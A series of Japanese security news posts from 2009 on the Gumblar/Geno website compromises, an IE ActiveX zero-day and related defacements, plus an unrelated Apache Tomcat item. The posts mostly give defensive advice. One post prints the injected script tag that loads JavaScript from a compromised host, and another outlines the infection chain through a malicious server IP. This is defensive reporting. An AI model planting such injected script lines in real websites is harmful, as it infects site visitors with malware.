爆発的に広まっているわけではないが、Genoウイルス(Gumblar) がまた復活してきているようだ。
現在のところセキュリティベンダー各社において検出率があまりよろしくない模様。
月曜を控えているのでシステム管理部門の方々はご注意を。
また、Webサイト管理をしている方は管理サイト内に改ざんがないか確認していただきたい。

一般的なユーザーの対策としては以下のとおり。

• Microsoft Updateの実行
• Adobe Reader(Acrobat, Acrobat Reader)を9.2.0に更新 (使用していない場合はアンインストール)
  　DL サイト
  　http://get.adobe.com/jp/reader/
• Adobe Flash Playerを10.0.32.18に更新
  　バージョン確認
  　http://www.adobe.com/jp/software/flash/about/
  　DL サイト
  　http://get.adobe.com/jp/flashplayer/
• セキュリティ対策ソフトを最新に保つ
• 可能であればFirefox + NoScriptの使用

これに加えてWebサイト管理者はFTPを使用せずSFTPなどセキュアな通信手段を用いるなどもあげられる。

また、日ごろからソフトウェアの更新確認をSecunia Personal Software Inspector (PSI)などで行うのも良いだろう。

今後さらに拡散する可能性があるため、続報に注意していただきたい。

参考サイト：
近況3つ
http://www3.atword.jp/gnome/2009/10/18/oct-18-09-sun-rapidly/
http://pc11.2ch.net/test/read.cgi/hosting/1253402905/277-283
http://blog.scansafe.com/journal/2009/10/15/gumblar-website-botnet-awakes.html

IPA:「 あなたのウェブサイト、改ざんされていませんか？ 」
http://www.ipa.go.jp/security/txt/2009/07outline.html
G DATA: GENOウイルスの二の舞を避けるために
http://gdata.co.jp/press/archives/2009/10/geno_1.htm

とタイトルを派手に訴えてしまったが、ノートンのヒューリスティック検出にスクリプトがひっかかり発覚した。
これがなければ発見がさらに遅れていた可能性がある。
今後さらに被害が広がる or すでに広がっている可能性もあり注意が必要だ。
確認できたのはswfファイルであったが、どの脆弱性を利用しているかは不明、攻撃成功後の動作(何をインストールするのか等)についても不明である。
例によってFTP経由での改ざんの模様。

loan-5●sakura●ne●jp/bank-loan/以下にあるスクリプトとswfファイルを全く関係ないサイトへ注入する方式。jpドメインのため気づかれにくく、タレこみ子も最初は見逃してしまっていた。

--補足--ココカラ--
iframe width='100' height='0'によって埋め込む。
FlashPlayerを未インストールのクライアントにはインストールを促す。
このとき、download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0というリンクでのインストールは古いバージョンをDLするように促しているのかもしれない。確認したところ最新版のような署名であったがインストールまではしていないので不明。
--補足--ココマデ--

ここで問題なのはbank-loan自体もおそらく乗っ取られているということだ。
つまりbank-loanだけでなく、他のサイトにもスクリプトファイルが置いてある可能性がある。
そのうち被害サイトへ直接置くものも出てくるかもしれないので注意が必要だ。
こうなるとNoScriptでも防ぎにくくなる。

--補足--ココカラ--
これは以前のGeno騒動時に負荷が集中してしまったサーバーへの負荷分散が目的だと推測される。
こうするくらいなら直接乗っ取りサーバーにスクリプト、swfファイルを置いても良いのではと思われるが、転送負荷やスクリプト更新に対する負荷増などの問題があるのかもしれない。
--補足--ココマデ--

注入部分は以下のとおりであった。
script行については何の細工もされていない。
まだ初期段階だった可能性があり今後細工が施されるのかもしれないが、このやり方の場合、少なくとも初回は細工なしのほうが良いと判断したのかもしれない。

<ul>
<li>本文</li>
<li>本文</li>
　　・・・
<li>本文</li>
</ul><script src=http://loan-5●sakura●ne●jp/bank-loan/google_service.js></script>
<p>本文</p>

スクリプトとswfファイルの検出結果は以下のとおり。未検出ベンダーへは有志が提出中[2ch.net]。

google_service.js(1/41)[VirusTotal]
ad_top.swf(3/41)[VirusTotal]

予防方法としては、
クライアント側：Adobe製品の更新(Genoと同じ)
サーバー側：FTPではなくセキュアな通信を使う(FTPしかできないところはマメにチェックするしかない？)

以下、個人の感想とか。
F-Secureは提出から1時間で返事がきてて驚きました。

Genoのときと同様に確定事項が少なくて記事にしにくいです。ほんとごめんなさい。
1つ目の補足はHTML、jsそれぞれのソースからですが、2つ目のは勝手な推測＋個人的な感想です。

当初の状況から限りなく黒に近かったもののMicrosoft以外はすべてスルーでした。
そのため本当に黒かわからなくて、F-Secureの結果でやっぱり黒かなーと判断しました。
swfについてはAVGも黒判定してるし、もう黒でよさそう。
被害にあったサイトで確認できているのは1つの個人サイトだけで、それもすでに修正済み＋閉鎖直前なので混乱を防ぐために載せていません。
他はまだ見つかってないだけかも・・・。

結局はGenoの亜種なんでたれこみにしていいか迷ったけどたれこみ。
修正済みの脆弱性だとしたらもう/.jpのみんなは対策してるよね。

各所(下部の※参照)によると、Microsoft Video ActiveX コントロールの脆弱性により、リモートでコードが実行される (972890)脆弱性を利用したゼロデイ攻撃が発生しているようだ。

なおこれは5月末に出た Microsoft DirectShow の脆弱性により、リモートでコードが実行される (971778)脆弱性とは別であることに注意。

クライアント側の対策としては IE を使用しない、もしくは Fix it による回避策の実行を行うなどがあげられる。

国内では VALUE DOMAIN のログイン ページ改ざん(2ch.net)が確認された。また VALUE DOMAIN を使用している wikiwik.jp 内でもサイトの改ざんがあり、各 wiki を閲覧したユーザーに被害が広がった模様。
wikiwiki.jp、VALUE DOMAIN ともに特に広報はなく、対処済みなのかなど現状は不明。
＃タレこみ子は改ざんされた状態を確認できなかったので、どの部分に注入されたのかなど詳細は不明。
なお、Geno ウイルス同様に被害サイトはほかにも多数あると推測される。

今回の攻撃サイトでは同時に Adobe 製品の脆弱性をついたコードも実行されるが、こちらは Geno 同様に Adobe 製品の更新によって対処が可能。
なお、Adobe Reader に関してはソフトの更新のほか、JavaScript 機能をオフにすることも推奨される。

※参考サイト(順不同)：
http://www3.atword.jp/gnome/2009/07/07/ie-new-zero-day/
http://ilion.blog47.fc2.com/blog-entry-140.html
http://lineage.paix.jp/guide/security/virus-site.html#VALUEDOMAIN
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2009/07.html#20090706_DirectShow
http://www.itmedia.co.jp/enterprise/articles/0907/07/news015.html

MEMO:
wikiwiki.jp関連のソースについては各所に情報が散在しているが被害者が状況を理解できていないようで、どうなっていたのかはっきりしない。
埋め込まれていたことは確実のようだけど・・・。
http://www.google.co.jp/search?q=wikiwiki.jp+%E3%83%88%E3%83%AD%E3%82%A4%E3%80%80%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&lr=lang_ja

http://enif.mmobbs.com/test/read.cgi/livero/1242218790/233-246

また、以下のサイトも攻撃コードが仕込まれていた模様だが現在閉鎖中で不明。
fewiki.jp

今のところ以下のサイトしか記事が見当たらない。
http://getnews.jp/archives/8719
4/4朝(詳細時刻不明)、GenoというPC通販ショップのサイトが乗っ取られた模様。
それによりトップページに何らかのマルウェアが仕込まれた。
＃現在はメンテナンス中と表示されるようだ
このマルウェアは新型であり一部のアンチウィルスが検知できる
ようになったが、まだほとんどのソフトが未対応である。
また検知はできても削除は対応していないため感染した際には
OSのクリーンインストールが推奨される。

今回の手法はAdobe Readerの脆弱性をついたスクリプトによって
マルウェアのインストールを行う模様であるが詳細は不明。
ラトビアへのトラフィックを飛ばすとのことである。

価格.comであったときと同様に他サイトでも被害が
あると思われるので注意が必要だ。
ユーザの対策としてはjavascriptをOFFにする、OSや各ソフトの
更新を最新にするなどがあげられる。

--------------------
＃いろいろ不明でうまくまとめられなくてすいません。
＃情報たらないからもう少し待ってから載せたほうがいいのかな。
＃2chだと右記です。http://tsushima.2ch.net/test/read.cgi/news/1238979735/
＃感染しはじめた時刻(1つ前から表示)　http://pc11.2ch.net/test/read.cgi/jisaku/1231510507/718-
---
http://tsushima.2ch.net/test/read.cgi/news/1238979735/613によるまとめ
(1)感染したWebページをひらく
↓
(2)感染したjsが、94.247.2.195の改変jquery.jsを実行
↓
(3)IP/UAで振り分け処理(Vistaは大丈夫そう？)
↓
(4)PDF/Flash起動。各種ウィルス本体をInternetTempに展開
↓
(5)bufferOverrunでウィルス本体の起動を試行

対策
AcrobatReader/Flashを最新版に
WindowsUpdate
94.247.2.195(94.247.2.* 94.247.3.*)への接続を遮断
---
被害の状況を見るとだいたい正しそう。

Apache Tomcat 5.5.12-alpha Releasedにおいて Tomcatがjakartaから卒業し、Apacheのトッププロジェクトへ移籍すること が発表されました。 ついでにCVSも卒業してSVNを使用し始めるようです。 URLも変わるからhttp://tomcat.apache.orgへブックマークしなおしてねとのこと。